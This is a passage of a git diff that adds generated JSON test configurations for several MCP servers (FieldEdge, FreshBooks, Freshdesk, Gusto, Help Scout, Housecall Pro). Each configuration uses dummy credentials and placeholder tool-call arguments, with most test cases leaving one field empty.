"FIELDEDGE_SUBSCRIPTION_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_work_orders": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_work_orders:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-customerId": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-technicianId": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-startDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-endDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "" + }, + "expect": "exists" + }, + "get_work_order": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_work_order": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_work_order:empty-locationId": { + "args": { + "customerId": "test-id-123", + "locationId": "", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-workType": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-priority": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-scheduledDate": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-scheduledTime": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-technicianId": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-notes": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "page": 50, + "pageSize": 50, + "search": "test query", + "sortBy": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-search": { + "args": { + "page": 50, + "pageSize": 50, + "search": "", + "sortBy": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortBy": { + "args": { + "page": 50, + "pageSize": 50, + "search": "test query", + "sortBy": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortOrder": { + "args": { + "page": 50, + "pageSize": 50, + "search": "test query", + "sortBy": "test_value", + "sortOrder": "" + }, + "expect": "exists" + }, + "list_technicians": { + "args": { + "page": 50, + "pageSize": 50, + "active": true, + "departmentId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_technicians:empty-departmentId": { + "args": { + "page": 50, + "pageSize": 50, + "active": true, + "departmentId": "" + }, + "expect": "exists" + }, + "list_invoices": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_invoices:empty-customerId": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_invoices:empty-startDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "test-id-123", + "startDate": "", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_invoices:empty-endDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "test-id-123", + "startDate": "test_value", + "endDate": "" + }, + "expect": "exists" + }, + "list_equipment": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "test-id-123", + "locationId": "test-id-123", + "equipmentType": "hvac" + }, + "expect": "content && content.length > 0" + }, + "list_equipment:empty-customerId": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "", + "locationId": "test-id-123", + "equipmentType": "hvac" + }, + "expect": "exists" + }, + "list_equipment:empty-locationId": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "test-id-123", + "locationId": "", + "equipmentType": "hvac" + }, + "expect": "exists" + }, + "list_equipment:empty-equipmentType": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "test-id-123", + "locationId": "test-id-123", + "equipmentType": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/fieldedge.json b/factory-tools/test-configs/fieldedge.json new file mode 100644 index 0000000..41e3edb --- /dev/null +++ b/factory-tools/test-configs/fieldedge.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/fieldedge/dist/index.js" + ], + "env": { + "FIELDEDGE_API_KEY": "factory_discovery_dummy", + "FIELDEDGE_SUBSCRIPTION_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshbooks-tests.json b/factory-tools/test-configs/freshbooks-tests.json new file mode 100644 index 0000000..c7cf30c --- /dev/null +++ b/factory-tools/test-configs/freshbooks-tests.json @@ -0,0 +1,358 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshbooks/dist/index.js" + ], + "env": { + "FRESHBOOKS_ACCESS_TOKEN": "factory_discovery_dummy", + "FRESHBOOKS_ACCOUNT_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_invoices": { + "args": { + "page": 50, + "per_page": 50, + "status": "draft" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "" + }, + "expect": "exists" + }, + "get_invoice": { + "args": { + "invoice_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_invoice": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "javascript", + "notes": "test_value", + "terms": "test_value", + "lines": [] + }, + "expect": "content && content.length > 0" + }, + "create_invoice:empty-currency_code": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "", + "notes": "test_value", + "terms": "test_value", + "lines": [] + }, + "expect": "exists" + }, + "create_invoice:empty-notes": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "javascript", + "notes": "", + "terms": "test_value", + "lines": [] + }, + "expect": "exists" + }, + "create_invoice:empty-terms": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "javascript", + "notes": "test_value", + "terms": "", + "lines": [] + }, + "expect": "exists" + }, + "send_invoice": { + "args": { + "invoice_id": "test-id-123", + "email_recipients": [], + "email_subject": "test@example.com", + "email_body": "test@example.com" + }, + "expect": "content && content.length > 0" + }, + "send_invoice:empty-email_subject": { + "args": { + "invoice_id": "test-id-123", + "email_recipients": [], + "email_subject": "", + "email_body": "test@example.com" + }, + "expect": "exists" + }, + "send_invoice:empty-email_body": { + "args": { + "invoice_id": "test-id-123", + "email_recipients": [], + "email_subject": "test@example.com", + "email_body": "" + }, + "expect": "exists" + }, + "list_clients": { + "args": { + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "create_client": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_client:empty-email": { + "args": { + "email": "", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-fname": { + "args": { + "email": "test@example.com", + "fname": "", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-lname": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-organization": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_street": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_city": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_province": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_code": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_country": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-currency_code": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-bus_phone": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-note": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "" + }, + "expect": "exists" + }, + "list_expenses": { + "args": { + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_payments": { + "args": { + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshbooks.json b/factory-tools/test-configs/freshbooks.json new file mode 100644 index 0000000..539f3de --- /dev/null +++ b/factory-tools/test-configs/freshbooks.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshbooks/dist/index.js" + ], + "env": { + "FRESHBOOKS_ACCESS_TOKEN": "factory_discovery_dummy", + "FRESHBOOKS_ACCOUNT_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshdesk-tests.json b/factory-tools/test-configs/freshdesk-tests.json new file mode 100644 index 0000000..6e142e7 --- /dev/null +++ b/factory-tools/test-configs/freshdesk-tests.json @@ -0,0 +1,315 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshdesk/dist/index.js" + ], + "env": { + "FRESHDESK_API_KEY": "factory_discovery_dummy", + "FRESHDESK_DOMAIN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_tickets": { + "args": { + "filter": "new_and_my_open", + "page": 50, + "per_page": 50, + "order_by": "test_value", + "order_type": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_tickets:empty-filter": { + "args": { + "filter": "", + "page": 50, + "per_page": 50, + "order_by": "test_value", + "order_type": "asc" + }, + "expect": "exists" + }, + "list_tickets:empty-order_by": { + "args": { + "filter": "new_and_my_open", + "page": 50, + "per_page": 50, + "order_by": "", + "order_type": "asc" + }, + "expect": "exists" + }, + "list_tickets:empty-order_type": { + "args": { + "filter": "new_and_my_open", + "page": 50, + "per_page": 50, + "order_by": "test_value", + "order_type": "" + }, + "expect": "exists" + }, + "get_ticket": { + "args": { + "id": 50, + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_ticket:empty-include": { + "args": { + "id": 50, + "include": "" + }, + "expect": "exists" + }, + "create_ticket": { + "args": { + "subject": "test_value", + "description": "test_value", + "email": "test@example.com", + "requester_id": 50, + "priority": 1, + "status": 2, + "type": "test_value", + "source": 50, + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "content && content.length > 0" + }, + "create_ticket:empty-email": { + "args": { + "subject": "test_value", + "description": "test_value", + "email": "", + "requester_id": 50, + "priority": 1, + "status": 2, + "type": "test_value", + "source": 50, + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "create_ticket:empty-type": { + "args": { + "subject": "test_value", + "description": "test_value", + "email": "test@example.com", + "requester_id": 50, + "priority": 1, + "status": 2, + "type": "", + "source": 50, + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "update_ticket": { + "args": { + "id": 50, + "subject": "test_value", + "description": "test_value", + "priority": 50, + "status": 50, + "type": "test_value", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "content && content.length > 0" + }, + "update_ticket:empty-subject": { + "args": { + "id": 50, + "subject": "", + "description": "test_value", + "priority": 50, + "status": 50, + "type": "test_value", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "update_ticket:empty-description": { + "args": { + "id": 50, + "subject": "test_value", + "description": "", + "priority": 50, + "status": 50, + "type": "test_value", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "update_ticket:empty-type": { + "args": { + "id": 50, + "subject": "test_value", + "description": "test_value", + "priority": 50, + "status": 50, + "type": "", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "reply_ticket": { + "args": { + "id": 50, + "body": "test_value", + "from_email": "test@example.com", + "user_id": 50, + "cc_emails": [], + "bcc_emails": [], + "private": true + }, + "expect": "content && content.length > 0" + }, + "reply_ticket:empty-from_email": { + "args": { + "id": 50, + "body": "test_value", + "from_email": "", + "user_id": 50, + "cc_emails": [], + "bcc_emails": [], + "private": true + }, + "expect": "exists" + }, + "list_contacts": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "mobile": "test_value", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-email": { + "args": { + "email": "", + "phone": "test_value", + "mobile": "test_value", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_contacts:empty-phone": { + "args": { + "email": "test@example.com", + "phone": "", + "mobile": "test_value", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_contacts:empty-mobile": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "mobile": "", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_contacts:empty-state": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "mobile": "test_value", + "company_id": 50, + "state": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_agents": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "state": "fulltime", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_agents:empty-email": { + "args": { + "email": "", + "phone": "test_value", + "state": "fulltime", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_agents:empty-phone": { + "args": { + "email": "test@example.com", + "phone": "", + "state": "fulltime", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_agents:empty-state": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "state": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "search_tickets": { + "args": { + "query": "test query", + "page": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshdesk.json b/factory-tools/test-configs/freshdesk.json new file mode 100644 index 0000000..76b7db1 --- /dev/null +++ b/factory-tools/test-configs/freshdesk.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshdesk/dist/index.js" + ], + "env": { + "FRESHDESK_API_KEY": "factory_discovery_dummy", + "FRESHDESK_DOMAIN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/gusto-tests.json b/factory-tools/test-configs/gusto-tests.json new file mode 100644 index 0000000..0bb19ea --- /dev/null +++ b/factory-tools/test-configs/gusto-tests.json @@ -0,0 +1,86 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/gusto/dist/index.js" + ], + "env": { + "GUSTO_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_employees": { + "args": { + "company_id": "test-id-123", + "page": 50, + "per": 50 + }, + "expect": "content && content.length > 0" + }, + "get_employee": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_payrolls": { + "args": { + "company_id": "test-id-123", + "processed": true, + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_payrolls:empty-start_date": { + "args": { + "company_id": "test-id-123", + "processed": true, + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "list_payrolls:empty-end_date": { + "args": { + "company_id": "test-id-123", + "processed": true, + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + }, + "get_payroll": { + "args": { + "company_id": "test-id-123", + "payroll_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_contractors": { + "args": { + "company_id": "test-id-123", + "page": 50, + "per": 50 + }, + "expect": "content && content.length > 0" + }, + "get_company": { + "args": { + "company_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_benefits": { + "args": { + "company_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/gusto.json b/factory-tools/test-configs/gusto.json new file mode 100644 index 0000000..e7c5837 --- /dev/null +++ b/factory-tools/test-configs/gusto.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/gusto/dist/index.js" + ], + "env": { + "GUSTO_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/helpscout-tests.json b/factory-tools/test-configs/helpscout-tests.json new file mode 100644 index 0000000..e2daf75 --- /dev/null +++ b/factory-tools/test-configs/helpscout-tests.json @@ -0,0 +1,287 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/helpscout/dist/index.js" + ], + "env": { + "HELPSCOUT_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_conversations": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_conversations:empty-status": { + "args": { + "mailbox": 50, + "status": "", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_conversations:empty-tag": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_conversations:empty-sortField": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_conversations:empty-sortOrder": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "" + }, + "expect": "exists" + }, + "get_conversation": { + "args": { + "id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_conversation": { + "args": { + "mailboxId": 50, + "subject": "test_value", + "customer": {}, + "type": "email", + "status": "active", + "threads": [], + "tags": [], + "assignTo": 50 + }, + "expect": "content && content.length > 0" + }, + "create_conversation:empty-type": { + "args": { + "mailboxId": 50, + "subject": "test_value", + "customer": {}, + "type": "", + "status": "active", + "threads": [], + "tags": [], + "assignTo": 50 + }, + "expect": "exists" + }, + "create_conversation:empty-status": { + "args": { + "mailboxId": 50, + "subject": "test_value", + "customer": {}, + "type": "email", + "status": "", + "threads": [], + "tags": [], + "assignTo": 50 + }, + "expect": "exists" + }, + "reply_conversation": { + "args": { + "conversationId": 50, + "text": "Sample content for testing", + "user": 50, + "customer": {}, + "type": "reply", + "status": "active", + "draft": true, + "cc": [], + "bcc": [] + }, + "expect": "content && content.length > 0" + }, + "reply_conversation:empty-type": { + "args": { + "conversationId": 50, + "text": "Sample content for testing", + "user": 50, + "customer": {}, + "type": "", + "status": "active", + "draft": true, + "cc": [], + "bcc": [] + }, + "expect": "exists" + }, + "reply_conversation:empty-status": { + "args": { + "conversationId": 50, + "text": "Sample content for testing", + "user": 50, + "customer": {}, + "type": "reply", + "status": "", + "draft": true, + "cc": [], + "bcc": [] + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-email": { + "args": { + "email": "", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-firstName": { + "args": { + "email": "test@example.com", + "firstName": "", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-lastName": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-query": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortField": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortOrder": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "" + }, + "expect": "exists" + }, + "list_mailboxes": { + "args": { + "page": 50 + }, + "expect": "content && content.length > 0" + }, + "search": { + "args": { + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "search:empty-sortField": { + "args": { + "query": "test query", + "page": 50, + "sortField": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "search:empty-sortOrder": { + "args": { + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/helpscout.json b/factory-tools/test-configs/helpscout.json new file mode 100644 index 0000000..7d6c118 --- /dev/null +++ b/factory-tools/test-configs/helpscout.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/helpscout/dist/index.js" + ], + "env": { + "HELPSCOUT_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/housecall-pro-tests.json b/factory-tools/test-configs/housecall-pro-tests.json new file mode 100644 index 0000000..aa6bf76 --- /dev/null +++ b/factory-tools/test-configs/housecall-pro-tests.json @@ -0,0 +1,227 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/housecall-pro/dist/index.js" + ], + "env": { + "HOUSECALL_PRO_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_jobs": { + "args": { + "page": 50, + "per_page": 50, + "status": "unscheduled", + "customer_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_jobs:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "", + "customer_id": "test-id-123" + }, + "expect": "exists" + }, + "list_jobs:empty-customer_id": { + "args": { + "page": 50, + "per_page": 50, + "status": "unscheduled", + "customer_id": "" + }, + "expect": "exists" + }, + "get_job": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_job": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "description": "test_value", + "scheduled_start": "test_value", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "content && content.length > 0" + }, + "create_job:empty-address_id": { + "args": { + "customer_id": "test-id-123", + "address_id": "", + "description": "test_value", + "scheduled_start": "test_value", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "create_job:empty-description": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "description": "", + "scheduled_start": "test_value", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "create_job:empty-scheduled_start": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "description": "test_value", + "scheduled_start": "", + "scheduled_end": "test_value", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "create_job:empty-scheduled_end": { + "args": { + "customer_id": 